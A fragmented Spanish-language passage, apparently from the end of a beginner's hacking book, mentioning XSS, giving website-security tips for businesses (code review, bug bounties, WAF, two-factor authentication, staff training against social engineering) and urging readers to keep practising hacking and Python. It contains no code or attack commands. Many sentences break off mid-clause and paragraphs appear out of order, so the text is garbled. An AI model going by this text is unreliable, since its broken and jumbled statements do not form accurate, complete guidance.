desconocidas y / o no deseadas. XSS (Cross-Site Scripting): los piratas informáticos utilizan esta técnica para destruir su sitio
web y / o ejecutar sus cargas útiles. Básicamente, un ataque XSS ocurre cuando un pirata informático inyecta códigos
Solicite a programadores expertos que revisen los códigos en su sitio web. Ejecute escáneres de
código.
Ofrezca recompensas a las personas que detectarán errores existentes en su sitio. Asegúrese de que su sitio
tenga WAF (Firewall de aplicaciones web). Este tipo de firewall supervisa su sistema y evita posibles ataques.
Implemente CAPTCHA o solicite a los visitantes del sitio web que respondan una pregunta. De esta manera, puede asegurarse
Aquí hay algunos consejos prácticos que puede usar para proteger su negocio:
No almacene información irrelevante del cliente: su sitio web será un objetivo sabroso para los piratas
informáticos si contiene información diversa relacionada con el cliente. Si desea proteger su negocio, no
guarde información que no va a utilizar. Por ejemplo, abstenerse de almacenar la información de la tarjeta de
La piratería es una actividad difícil. Los hackers no te atacarán si tu sitio web no tiene nada digno de robo.
Almacenar información del cliente es conveniente. Sin embargo, los riesgos involucrados aquí superan los
beneficios.
basa en tecnología obsoleta. Sería mejor si implementara una autenticación de dos factores antes de dar
acceso a información confidencial. Eduque a su gente: la defensa de su red es tan poderosa como su
empleado más débil. Tenga en cuenta que los hackers pueden usar tácticas de ingeniería social. Si uno de
sus empleados cae en tales trucos, la seguridad de su negocio estará en peligro. Su firewall y los códigos de
sitios web perfectos no importarán si sus empleados son imprudentes cuando manejan sus contraseñas.
En estos días, la seguridad digital es el trabajo de todos. Eduque a sus empleados sobre la importancia de la
vigilancia y el cuidado, especialmente al manejar información confidencial. Además, capacite a su gente sobre
Espero que este libro haya podido ayudarte a aprender los conceptos básicos de piratería.
El siguiente paso es practicar sus habilidades de piratería y programación de forma regular. La tecnología
informática evoluciona a un ritmo deslumbrante. Debes seguir estudiando las últimas técnicas de piratería.
También debes mantener tu arsenal actualizado. Cada vez más hackers comparten sus herramientas con
debe tener los programas más nuevos y más fuertes. La programación es un aspecto importante de la
piratería. Obtendrá una gran mejora en sus habilidades de piratería si sabe cómo usar varios lenguajes de
computadora. El tercer capítulo de este libro explica los conceptos básicos de Python. Lea ese material varias
veces para que pueda comprender la sintaxis del lenguaje Python. Es cierto que Python es uno de los
También es importante practicar tus habilidades de piratería. Descargue diferentes sistemas operativos y ejecútelos como
Al aprender a programar y mantenerse actualizado con las últimas técnicas de piratería, se convertirá en un